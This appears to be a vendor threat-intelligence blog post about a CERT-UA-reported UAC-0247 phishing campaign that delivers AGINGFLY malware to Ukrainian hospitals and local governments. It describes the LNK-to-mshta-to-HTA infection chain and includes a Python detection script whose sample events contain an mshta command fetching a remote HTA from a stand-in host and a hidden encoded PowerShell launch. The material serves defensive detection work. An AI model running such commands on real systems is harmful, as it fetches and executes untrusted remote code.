UAC-0247 Attack Detection: AGINGFLY Malware Targets Hospitals, Local Governments, and FPV Operators in Ukraine

SOC Prime Team

Phishing remains one of the most effective tactics in the cybercriminal playbook, particularly when attackers exploit urgent humanitarian themes, trusted online resources, and legitimate system tools to increase victim engagement. Europol also notes that phishing continues to serve as a primary delivery vector for data-stealing malware. This pattern is clearly reflected in the latest activity tracked by CERT-UA, where threat actors used humanitarian-aid themed lures and multi-stage malware delivery to target Ukrainian organizations.

In a CERT-UA article, researchers described a UAC-0247 campaign targeting local self-government bodies, communal healthcare institutions, and likely representatives of Ukraine’s Defense Forces. The operation ultimately deployed AGINGFLY and related malicious tools, combining phishing, deceptive web delivery, and abuse of legitimate Windows utilities to establish access and support follow-on compromise.

CERT-UA’s latest reporting highlights another wave of phishing-driven intrusions targeting Ukraine’s civilian and potentially defense-adjacent sectors. In the campaign described in the article, attackers used humanitarian-aid themed emails to lure victims into opening malicious content that eventually deployed AGINGFLY, a malware family associated with remote access, credential theft, and follow-on post-compromise activity. The observed targets included local self-government bodies; communal healthcare institutions, including clinical and emergency hospitals; and individuals likely connected to FPV drone operations.

Sign up for the SOC Prime Platform to proactively defend your organization against UAC-0247 attacks. Just press Explore Detections below and access a relevant detection rule stack, enriched with AI-native CTI, mapped to the MITRE ATT&CK® framework, and compatible with a wide range of SIEM, EDR, and Data Lake technologies.

Security teams can search the Threat Detection Marketplace using the “UAC-0247” tag to identify relevant detections and monitor related content updates. Cyber defenders can also rely on Uncoder AI to convert raw threat intelligence into performance-optimized queries, document and improve rule logic, and generate Attack Flows based on the latest CERT-UA reporting.

Analyzing UAC-0247 Attacks Delivering AGINGFLY via Humanitarian-Themed Phishing Lures

According to CERT-UA, the attack chain began with phishing emails disguised as humanitarian aid proposals. Victims were prompted to click a link that redirected either to a legitimate website compromised through cross-site scripting (XSS) or to a fake website generated with AI tools. In both scenarios, the objective was to persuade the victim to download and open an archive containing a malicious LNK file.

Once launched, the shortcut file abused mshta.exe to retrieve and execute a remote HTA file. The HTA displayed a decoy form to distract the victim while simultaneously downloading an executable that injected shellcode into a legitimate process, such as RuntimeBroker.exe. CERT-UA also noted that more recent stages of the campaign relied on a two-stage loader, with the second stage using a proprietary executable format and the final payload additionally compressed and encrypted to complicate detection and analysis.

Among the next-stage components identified in the campaign were RAVENSHELL, which acted as a reverse-shell style stager, SILENTLOOP, a PowerShell-based tool capable of executing commands and obtaining command-and-control data, and AGINGFLY, the primary malware family used in the operation. CERT-UA-linked reporting indicates that AGINGFLY is designed for remote control, data theft, and follow-on compromise activity.

The campaign also supported credential theft, reconnaissance, and lateral movement. Investigators observed the use of tooling to extract data from Chromium-based browsers, access messaging-related data, scan internal networks, and tunnel traffic across compromised environments. In one of the investigated cases, forensic evidence suggested that representatives of Ukraine’s Defense Forces may have been targeted using malicious ZIP archives distributed via Signal and designed to deploy AGINGFLY through DLL side-loading.

To reduce exposure to this activity, CERT-UA recommends restricting the execution of risky file types such as LNK, HTA, and JS, while also limiting or closely monitoring the use of native Windows tools frequently abused in the infection chain, including mshta.exe, powershell.exe, and wscript.exe.
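The chain described above (a double-clicked LNK launching mshta.exe against a remote HTA, the HTA handing off to PowerShell, and shellcode landing in RuntimeBroker.exe) maps directly onto the monitoring CERT-UA recommends. The following is an added example written for this article, not code from SOC Prime, CERT-UA, or any SOC Prime detection rule: it evaluates Sysmon-style process-creation (EventID 1) and CreateRemoteThread (EventID 8) events against a handful of rules derived from the reported behaviour. All event records, field names, file paths, and the `example.invalid` URL are constructed for illustration, and the rule names are assumptions, not identifiers from the report.

```python
"""Detection logic for the LNK -> mshta.exe -> remote HTA -> injection chain
described in the CERT-UA reporting above.

Added example, not SOC Prime or CERT-UA code. The event records below are
constructed, Sysmon-style (EventID 1 process creation, EventID 8
CreateRemoteThread); field names, paths and the URL are assumptions.
"""
from __future__ import annotations

import json
import re
from typing import Iterable

# Native Windows tools the article says CERT-UA recommends restricting or monitoring.
MONITORED_TOOLS = {"mshta.exe", "powershell.exe", "wscript.exe"}
# Script hosts that, in the reported chain, hand off to a PowerShell-based stage.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Legitimate process named in the report as a shellcode injection target.
INJECTION_TARGETS = {"runtimebroker.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule that fires for a single event."""
    hits: list[str] = []
    eid = event.get("EventID")
    if eid == 1:  # process creation
        image = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        # Rule 1: mshta.exe retrieving an HTA over HTTP(S), the LNK stage of the chain.
        if image == "mshta.exe" and REMOTE_URL.search(cmd):
            hits.append("mshta_remote_hta")
        # Rule 2: a script host spawning PowerShell, i.e. the HTA launching a loader.
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            hits.append("script_host_spawns_powershell")
        # Rule 3: a monitored tool started straight from explorer.exe, which is what a
        # double-clicked shortcut (LNK) looks like in process telemetry.
        if parent == "explorer.exe" and image in MONITORED_TOOLS:
            hits.append("user_launched_lolbin")
    elif eid == 8:  # CreateRemoteThread
        target = basename(event.get("TargetImage", ""))
        source = basename(event.get("SourceImage", ""))
        # Rule 4: a foreign process creating a thread inside RuntimeBroker.exe (T1055).
        if target in INJECTION_TARGETS and source != target:
            hits.append("remote_thread_into_runtimebroker")
    return hits


def scan(lines: Iterable[str]) -> list[tuple[int, list[str]]]:
    """Evaluate JSON-lines events; return (line_no, rules) for each alerting event."""
    alerts: list[tuple[int, list[str]]] = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        hits = evaluate(json.loads(line))
        if hits:
            alerts.append((n, hits))
    return alerts


# Constructed sample telemetry modelled on the reported chain (not real IoCs).
SAMPLE_EVENTS = r"""
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe https://example.invalid/aid-form.hta"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -enc AAAA"}
{"EventID": 8, "SourceImage": "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe", "TargetImage": "C:\\Windows\\System32\\RuntimeBroker.exe"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"}
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
"""

if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE_EVENTS.splitlines()):
        print(f"event {line_no}: {', '.join(rules)}")
```

Run against the embedded sample, the first three events alert (remote HTA retrieval plus explorer-launched mshta, mshta spawning PowerShell, and a remote thread into RuntimeBroker.exe) while the scheduled inventory script and the notepad launch stay quiet. In production the same rules belong in the SIEM or EDR query language rather than a script, but the parent/child and command-line conditions carry over unchanged.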

MITRE ATT&CK Context

Leveraging MITRE ATT&CK helps contextualize the latest UAC-0247 activity. Based on the reported TTPs, the most relevant techniques likely include Phishing: Spearphishing Link (T1566.002), Command and Scripting Interpreter, Process Injection (T1055), Web Protocols / WebSockets for C2, Credential Access, and Lateral Movement via tunneling and proxying tools. This mapping reflects the phishing lures, deceptive web delivery, LNK-to-HTA execution, shellcode injection, AGINGFLY deployment, and follow-on credential theft and internal reconnaissance.

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.
